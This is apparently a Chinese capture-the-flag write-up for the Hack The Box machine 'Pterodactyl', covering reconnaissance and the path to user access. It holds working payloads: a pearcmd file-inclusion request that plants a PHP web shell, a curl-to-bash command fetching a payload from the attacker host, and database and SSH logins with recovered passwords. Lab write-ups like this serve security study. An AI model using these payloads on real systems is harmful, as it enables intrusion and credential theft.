HTB 赛季10 - Pterodactyl - user

瘾大侠2026-02-13 9:58
复制代码 
10.129.16.212

nmap扫描

复制代码 
sudo nmap --top-ports 10000 10.129.16.212 --min-rate=1000 -oA ips_quick_TCP_nmapscan && sudo nmap --top-ports 10000 10.129.16.212 --min-rate=1000 -sU -oA ips_quick_UDP_nmapscan && nmap -p- 10.129.16.212 -oA ips_full_TCP_nmapscan --min-rate=1000 && sudo nmap -p- 10.129.16.212 -sU -oA ips_full_UDP_nmapscan --min-rate=1000

!\[Pasted image 20260208171012.png]

http://pterodactyl.htb/changelog.txt

!\[Pasted image 20260208171809.png]

我们注意到其背后有一个存在RCE的Panel中间件。我们对Web应用进行枚举

复制代码 
ffuf -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-small.txt:FUZZ -u http://pterodactyl.htb/FUZZ -e .php -mc all

ffuf -w /home/kali/Desktop/Info/SecLists-master/SecLists-master/Discovery/DNS/subdomains-top1million-110000.txt:FUZZ -u http://pterodactyl.htb/ -H 'Host: FUZZ.pterodactyl.htb' -mc all -fw 18

!\[Pasted image 20260208172226.png]

!\[Pasted image 20260208172440.png]

我们了解到这个漏洞存在,经过大量尝试,我们发现该漏洞是一种php文件包含的变种,他包含了pearcmd后,导致了RCE。我的payload如下

复制代码 
/locales/locale.json?locale=../../../../../../../../../../usr/share/php/PEAR/&namespace=pearcmd&+config-create+/'<?=phpinfo()?>'+/tmp/info.php

!\[Pasted image 20260208183251.png]

复制代码 
/locales/locale.json?locale=..%2F..%2F..%2F..%2F..%2Ftmp&namespace=info

!\[Pasted image 20260208183309.png]

我们开始反连

复制代码 
/locales/locale.json?locale=../../../../../../../../../../usr/share/php/PEAR/&namespace=pearcmd&+config-create+/'<?=system($_GET["cmd"])?>'+/tmp/shell.php

!\[Pasted image 20260208183354.png]

复制代码 
/locales/locale.json?locale=..%2F..%2F..%2F..%2F..%2Ftmp&namespace=shell&cmd=curl+http://10.10.14.14/pwn|bash

!\[Pasted image 20260208183543.png]

!\[Pasted image 20260208183627.png]

上linpeas

复制代码 
wget http://10.10.14.14:81/linpeas.sh && chmod 755 linpeas.sh && ./linpeas.sh

!\[Pasted image 20260208184031.png]

喷洒密码,没有用

复制代码 
PteraPanel

wget http://10.10.14.14:81/pspy64 && chmod 755 pspy64 && ./pspy64

pterodactyl
PteraPanel

mysql -h127.0.0.1 -upterodactyl -pPteraPanel -e 'Show databases;use panel;show tables;Select * from users;Select username,password from users;'

!\[Pasted image 20260208190605.png]

!\[Pasted image 20260208191849.png]

复制代码 
ssh phileasfogg3@10.129.16.212 
!QAZ2wsx

!\[Pasted image 20260208191631.png]

我到这里发现了一封邮件并确认时使用udisk2的相关漏洞,但是我始终没能根据描述完成攻击。

相关推荐
Aphasia3113 天前
VPN 与内网穿透
安全
Mr_愚人派4 天前
当"Claude"不再是 Claude:一次第三方 API 代理引发的 AI 身份伪造排查实录
人工智能·安全
DaLi Yao5 天前
【无标题】
人工智能·安全
Alsn865 天前
等待学习-学习目录:Docker 容器安全攻防
学习·安全·docker
网络研究院5 天前
2026年网络安全
网络·安全·法律·法规·趋势·发展
酣大智5 天前
ARP代理--工作原理
运维·网络·arp·arp代理
treesforest5 天前
AI安全系统如何识别异常访问?IP风险识别正在成为关键能力
网络·人工智能·tcp/ip·安全·web安全
shushangyun_5 天前
2026年快消品B2B系统推荐:支持终端门店订货、促销政策自动化的工具?
java·运维·网络·数据库·人工智能·spring·自动化
2601_961845155 天前
粉笔行测题库|系统班|刷题
网络·百度·微信·微信公众平台·facebook·新浪微博
零零信安5 天前
零零信安荣登数世咨询《新质·数字安全专精百强(2026)》暗网情报领域,彰显专业实力与创新引领
安全·网络安全·数据泄露·暗网·零零信安
热门推荐
012026年6月AI大模型全景报告:GPT-5.6、Claude Opus 4.8、Gemini 3.5,中美AI三足鼎立谁主沉浮?022026年6月AI行业全景:从百模大战到Agent元年,这30天发生了什么?032026 年 AI 编程工具终极横评:Cursor vs Claude Code vs Copilot vs Windsurf04【AI】2026 年具身智能模型和世界模型总结05GitHub 镜像站点06Claude Code、Codex、Cursor三分天下:2026年AI编程Agent生态全景剖析07AI科技热点日报 | 2026年6月1日08AI一周事件 · 2026-06-03 至 2026-06-0909Codex 下载安装指南:Windows 和 macOS 官方版下载10上线仅72小时被强制下架:Claude Fable 5 的短命